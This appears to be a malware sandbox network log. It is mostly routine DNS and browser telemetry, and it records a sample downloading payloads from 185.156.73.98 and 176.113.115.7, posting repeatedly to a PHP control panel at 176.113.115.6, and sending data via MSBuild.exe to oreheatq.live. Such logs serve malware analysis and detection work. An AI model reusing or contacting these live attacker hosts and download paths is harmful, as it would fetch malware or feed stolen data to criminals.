server-timing: cfL4;desc="?proto=TCP&rtt=103475&min_rtt=43066&rtt_var=46180&sent=17&recv=19&lost=0&retrans=0&sent_bytes=7525&recv_bytes=4428&delivery_rate=14026&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2I3osQ%2Fim188nP99IsB8I7msLafEeo86hauTSpUM8A2eusNc4W4tKPeaA2YRkGV8G%2Fxb4%2B2kalhK0DjMuRPcfBe6Gzo81a%2Bx3C3mzhytqQhVZb4%2FeAuZkujqam0VdiuL3aaMpTEWhQyeuSOis5div2QXXpY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c55fb8decfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=109269&min_rtt=43066&rtt_var=46224&sent=19&recv=21&lost=0&retrans=0&sent_bytes=8473&recv_bytes=4920&delivery_rate=14026&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIdBLHk7ZyckUhrkfL02hjyaCSZgnpZJKlnzNE7FqHmUI76MmrQAkeowlEXGpMY%2BHSq54s7%2B5j07ZIxtulfw50x%2BZ9Xkj5nz1F%2BE1FT4FnJc9Hllhm16ab9SRVsPa3EHEYx4PWzxTD9sr7%2F3YPuGru8SyX8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c5a4fd0ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=108458&min_rtt=43066&rtt_var=36291&sent=21&recv=23&lost=0&retrans=0&sent_bytes=9419&recv_bytes=5412&delivery_rate=14026&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

httpbin.org

Request

httpbin.org

IN A

Response

httpbin.org

IN A

3.224.7.64

httpbin.org

IN A

100.28.166.39
DNS

rest-api.degoo.com

Request

rest-api.degoo.com

IN A

Response

rest-api.degoo.com

IN A

104.18.173.56

rest-api.degoo.com

IN A

104.17.109.63
DNS

edge.microsoft.com

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.27.11

ax-0002.ax-msedge.net

IN A

150.171.28.11
DNS

edge.microsoft.com

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net
DNS

ntp.msn.com

Request

ntp.msn.com

IN A

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

ntp.msn.com

Request

ntp.msn.com

IN Unknown

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net
DNS

edge.microsoft.com

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.28.11

ax-0002.ax-msedge.net

IN A

150.171.27.11
DNS

www.youtube.com

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.187.206
DNS

edge.microsoft.com

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net
DNS

clients2.google.com

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.16.238
DNS

clients2.google.com

Request

clients2.google.com

IN Unknown

Response

clients2.google.com

IN CNAME

clients.l.google.com
GET

http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:b8UeFzUJQqC7kdbLeL8FplTtl0M-N3uyaYWi9MaNN5I&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request

GET /browsernetworktime/time/1/current?cup2key=2:b8UeFzUJQqC7kdbLeL8FplTtl0M-N3uyaYWi9MaNN5I&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1
Host: edge.microsoft.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Sec-Mesh-Client-Edge-Version: 133.0.3065.69
Sec-Mesh-Client-Edge-Channel: stable
Sec-Mesh-Client-OS: Windows
Sec-Mesh-Client-OS-Version: 10.0.19041
Sec-Mesh-Client-Arch: x86_64
Sec-Mesh-Client-WebView: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 98
Content-Type: application/json
Content-Encoding: gzip
Expires: Mon, 01 Jan 1990 00:00:00 GMT
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
x-cup-server-proof: 30440220258AFAF4882531A96843CB7E6670BE7F38F7296FEF3DEA756BCB584C9019E5B5022056B4E69C1632BE112B76BC6196B4EAB14361FCF0CC702AD850F3D29E7A5E3CDE:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Content-Disposition: attachment; filename='json.txt'
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: F2B4FC76F6104DBBBBBC42DB9B39045B Ref B: LON04EDGE1213 Ref C: 2025-03-29T01:31:51Z
Date: Sat, 29 Mar 2025 01:31:51 GMT
DNS

clients2.googleusercontent.com

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.1
DNS

clients2.googleusercontent.com

Request

clients2.googleusercontent.com

IN Unknown

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com
DNS

wxayfarer.live

Request

wxayfarer.live

IN A

Response
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN A

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net

a2033.dscd.akamai.net

IN A

2.18.190.174

a2033.dscd.akamai.net

IN A

2.18.190.170
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN Unknown

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net
DNS

copilot.microsoft.com

Request

copilot.microsoft.com

IN A

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net

e107108.dscx.akamaiedge.net

IN A

88.221.135.26

e107108.dscx.akamaiedge.net

IN A

95.101.143.218
DNS

copilot.microsoft.com

Request

copilot.microsoft.com

IN Unknown

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net
DNS

img-s-msn-com.akamaized.net

Request

img-s-msn-com.akamaized.net

IN A

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net

a1834.dscg2.akamai.net

IN A

2.19.252.154

a1834.dscg2.akamai.net

IN A

2.19.252.151
DNS

img-s-msn-com.akamaized.net

Request

img-s-msn-com.akamaized.net

IN Unknown

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net
DNS

sb.scorecardresearch.com

Request

sb.scorecardresearch.com

IN A

Response

sb.scorecardresearch.com

IN A

52.85.92.87

sb.scorecardresearch.com

IN A

52.85.92.105

sb.scorecardresearch.com

IN A

52.85.92.104

sb.scorecardresearch.com

IN A

52.85.92.116
DNS

sb.scorecardresearch.com

Request

sb.scorecardresearch.com

IN Unknown

Response
DNS

th.bing.com

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.182

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

88.221.135.11

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

95.101.143.202

e86303.dscx.akamaiedge.net

IN A

95.101.143.177

e86303.dscx.akamaiedge.net

IN A

88.221.135.25
DNS

th.bing.com

Request

th.bing.com

IN Unknown

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

c.msn.com

Request

c.msn.com

IN A

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net

c-msn-pme.trafficmanager.net

IN A

13.74.129.1
DNS

c.msn.com

Request

c.msn.com

IN Unknown

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net
DNS

c.bing.com

Request

c.bing.com

IN A

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

c.bing.com

Request

c.bing.com

IN Unknown

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net
DNS

assets.msn.com

Request

assets.msn.com

IN A

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net

a233.dscd.akamai.net

IN A

2.18.190.182

a233.dscd.akamai.net

IN A

2.18.190.171
DNS

assets.msn.com

Request

assets.msn.com

IN Unknown

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net
DNS

youla.ru

Request

youla.ru

IN A

Response

youla.ru

IN A

95.163.61.105
DNS

browser.events.data.msn.com

Request

browser.events.data.msn.com

IN A

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprdweu11.westeurope.cloudapp.azure.com

onedscolprdweu11.westeurope.cloudapp.azure.com

IN A

52.178.17.234
DNS

browser.events.data.msn.com

Request

browser.events.data.msn.com

IN Unknown

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprdeus14.eastus.cloudapp.azure.com
DNS

srtb.msn.com

Request

srtb.msn.com

IN A

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

srtb.msn.com

Request

srtb.msn.com

IN Unknown

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net
DNS

google.com

Request

google.com

IN MX

Response

google.com

IN MX

smtp�
DNS

smtp.google.com

Request

smtp.google.com

IN A

Response

smtp.google.com

IN A

64.233.184.27

smtp.google.com

IN A

142.251.168.27

smtp.google.com

IN A

142.251.168.26

smtp.google.com

IN A

142.251.173.27

smtp.google.com

IN A

64.233.184.26
DNS

r.bing.com

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.177

e86303.dscx.akamaiedge.net

IN A

95.101.143.202

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

88.221.135.11

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

95.101.143.182
DNS

r.bing.com

Request

r.bing.com

IN Unknown

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

r.msftstatic.com

Request

r.msftstatic.com

IN A

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net

r-msftstatic-com.a-0016.a-msedge.net

IN CNAME

a-0016.a-msedge.net

a-0016.a-msedge.net

IN A

204.79.197.219
DNS

r.msftstatic.com

Request

r.msftstatic.com

IN Unknown

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net
DNS

edgeassetservice.azureedge.net

Request

edgeassetservice.azureedge.net

IN A

Response

edgeassetservice.azureedge.net

IN CNAME

edgeassetservice.afd.azureedge.net

edgeassetservice.afd.azureedge.net

IN CNAME

azureedge-t-prod.trafficmanager.net

azureedge-t-prod.trafficmanager.net

IN CNAME

shed.dual-low.s-part-0036.t-0009.t-msedge.net

shed.dual-low.s-part-0036.t-0009.t-msedge.net

IN CNAME

s-part-0036.t-0009.t-msedge.net

s-part-0036.t-0009.t-msedge.net

IN A

13.107.246.64
DNS

edgeassetservice.azureedge.net

Request

edgeassetservice.azureedge.net

IN Unknown

Response

edgeassetservice.azureedge.net

IN CNAME

edgeassetservice.afd.azureedge.net

edgeassetservice.afd.azureedge.net

IN CNAME

azureedge-t-prod.trafficmanager.net

azureedge-t-prod.trafficmanager.net

IN CNAME

shed.dual-low.s-part-0036.t-0009.t-msedge.net

shed.dual-low.s-part-0036.t-0009.t-msedge.net

IN CNAME

s-part-0036.t-0009.t-msedge.net
GET

http://185.156.73.98/ycl

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: d
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="dll";
Content-Length: 242176
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/ycl

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: s
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="soft";
Content-Length: 3096296
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:c47c::
DNS

youtube.com

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.16.238
DNS

spocs.getpocket.com

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

merino.services.mozilla.com

Request

merino.services.mozilla.com

IN A

Response

merino.services.mozilla.com

IN A

34.110.138.217
DNS

merino.services.mozilla.com

Request

merino.services.mozilla.com

IN A

Response

merino.services.mozilla.com

IN A

34.110.138.217
DNS

prod.ads.prod.webservices.mozgcp.net

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

youtube.com

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.16.238
DNS

merino.services.mozilla.com

Request

merino.services.mozilla.com

IN AAAA

Response
DNS

youtube.com

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:821::200e
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.ads.prod.webservices.mozgcp.net

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

youtube-ui.l.google.com

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:81f::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:820::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:822::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

www.instagram.com

Request

www.instagram.com

IN A

Response

www.instagram.com

IN CNAME

z-p42-instagram.c10r.instagram.com

z-p42-instagram.c10r.instagram.com

IN A

163.70.147.174
DNS

consent.youtube.com

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
DNS

example.org

Request

example.org

IN A

Response

example.org

IN A

23.215.0.133

example.org

IN A

23.215.0.132

example.org

IN A

96.7.128.186

example.org

IN A

96.7.128.192
DNS

ipv4only.arpa

Request

ipv4only.arpa

IN A

Response

ipv4only.arpa

IN A

192.0.0.170

ipv4only.arpa

IN A

192.0.0.171
DNS

prod.detectportal.prod.cloudops.mozgcp.net

Request

prod.detectportal.prod.cloudops.mozgcp.net

IN A

Response

prod.detectportal.prod.cloudops.mozgcp.net

IN A

34.107.221.82
DNS

consent.youtube.com

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
GET

http://detectportal.firefox.com/success.txt?ipv4

Request

GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Priority: u=4
Pragma: no-cache
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Fri, 28 Mar 2025 11:55:12 GMT
Age: 49025
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
DNS

consent.youtube.com

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

prod.detectportal.prod.cloudops.mozgcp.net

Request

prod.detectportal.prod.cloudops.mozgcp.net

IN AAAA

Response

prod.detectportal.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:38d7::
DNS

mail.ru

Request

mail.ru

IN MX

Response

mail.ru

IN MX

mxs�
DNS

mxs.mail.ru

Request

mxs.mail.ru

IN A

Response

mxs.mail.ru

IN A

217.69.139.150

mxs.mail.ru

IN A

94.100.180.31
DNS

www.google.com

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
DNS

www.google.com

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81e::2004

150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

HTTP Response

204
176.113.115.6:80

http://176.113.115.6/Ni9kiput/index.php

http

rapes.exe

8.2kB
10.1kB
63
42

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/887739535/FMXv4s3.exe

http

rapes.exe

159.4kB
4.8MB
3417
3415

HTTP Request

GET http://176.113.115.7/files/8104437623/EPTwCQd.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/7001656225/Rm3cVPI.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/6691015685/UYpk7xI.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/rast333a/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/887739535/FMXv4s3.exe

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

MSBuild.exe

3.3kB
5.8kB
17
15

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

MSBuild.exe

2.1kB
4.6kB
10
10

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

MSBuild.exe

1.1kB
4.1kB
9
9

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
